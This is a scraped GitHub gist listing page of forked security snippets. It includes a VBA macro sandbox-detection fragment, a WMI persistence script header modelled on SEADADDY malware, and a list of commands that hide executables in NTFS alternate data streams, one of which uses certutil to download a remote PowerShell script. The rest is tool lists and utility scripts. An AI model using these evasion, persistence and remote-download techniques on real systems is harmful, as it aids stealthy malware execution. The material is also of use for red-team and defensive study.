The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
Alexander Knorr opexxx
opexxx
/ MacroDetectSandbox.vbs
Created
September 22, 2020 11:17
— forked from mgeeky/MacroDetectSandbox.vbs
Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean | |
| Public Function IsFileNameNotAsHexes() As Boolean | |
| Dim str As String | |
| Dim hexes As Variant | |
| Dim only_hexes As Boolean | |
| only_hexes = True | |
| hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _ | |
| "8", "9", "a", "b", "c", "d", "e", "f") |
opexxx
/ WMIPersistence.vbs
Created
September 22, 2020 11:17
— forked from mgeeky/WMIPersistence.vbs
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' | |
| ' The scheduled command will be launched after roughly 3 minutes since system | |
| ' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
| ' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
| ' |
opexxx
/ Exe_ADS_Methods.txt
Created
January 18, 2020 00:55
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Add content to ADS### | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
opexxx
/ iranian_apit_groups_possible_commands.md
Created
January 9, 2020 23:31
— forked from MSAdministrator/iranian_apit_groups_possible_commands.md
Iranian APT Groups & Possible Commands Used By These Groups
opexxx
/ gh-backup-starred.sh
Created
November 20, 2019 00:29
— forked from anonymous/gh-backup-starred.sh
Backup starred GitHub repositories
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| user="CHANGEME" | |
| pages=$(curl -I https://api.github.com/users/$user/starred | sed -nr 's/^Link:.*page=([0-9]+).*/\1/p') | |
| for page in $(seq 0 $pages); do | |
| curl "https://api.github.com/users/$user/starred?page=$page&per_page=100" | jq -r '.[].html_url' | | |
| while read rp; do | |
| git clone $rp | |
| done |
opexxx
/ roycewilliams-github-starred.md
Created
October 28, 2019 09:42
— forked from roycewilliams/roycewilliams-github-starred.md
roycewilliams-github-starred.md
- https://github.com/003random/003Recon
- https://github.com/0x27/ssh_keyscanner
- https://github.com/0x4a0x72/pwnedless
- https://github.com/0x4D31/fatt
- https://github.com/0x4D31/honeyLambda
- https://github.com/0x90/miranda-upnp
- https://github.com/0xbadjuju/Tokenvator
- https://github.com/0xbsec/duprule
opexxx
/ ToolBox.sh
Last active
October 28, 2019 13:56
— forked from BaRRaKudaRain/ToolBox.sh
This script will download some tools for pentesting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo " ______ ______ ______ __ ______ ______ __ __ ______ __ __ | |
| /\__ _\ /\ __ \ /\ __ \ /\ \ /\ == \ /\ __ \ /\_\_\_\ /\ ___\ /\ \_\ \ | |
| \/_/\ \/ \ \ \/\ \ \ \ \/\ \ \ \ \____ \ \ __< \ \ \/\ \ \/_/\_\/_ \ \___ \ \ \ __ \ | |
| \ \_\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ /\_\/\_\ \/\_____\ \ \_\ \_\ | |
| \/_/ \/_____/ \/_____/ \/_____/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/_/\/_/ " | |
| echo "" |
opexxx
/ aquatonescane_alexa.sh
Last active
October 25, 2019 12:59
— forked from ptantiku/favicon_download.sh
Download top 1000 website's favicon image.Websites are ranked by Alexa.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip | |
| unzip top-1m.csv.zip | |
| for l in `cat top-1m.csv | cut -d',' -f2` | |
| do | |
| aquatone-discover -d $l --threads 90 | |
| done |
opexxx
/ socio-political-word-list.txt
Created
July 3, 2019 11:51
— forked from tbooch/socio-political-word-list.txt
List of social, political issues and words for tracking, highlighting, etc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 4chan | |
| activis* | |
| allah | |
| alpha | |
| alt-right* | |
| anarchis* | |
| anita sarkeesian | |
| arian | |
| aryan | |
| Auschwitz |
opexxx
/ README.md
Created
May 29, 2019 10:37
— forked from paralax/README.md
Using Terraform and Docker, demoed with CyberChef
Recently I had to learn myself some Terraform for real, and it hit me - Docker (which I have come to use extensively) would be a perfect environment in which to do this.
Before you begin, make sure you have Terraform installed:
$ brew install terraform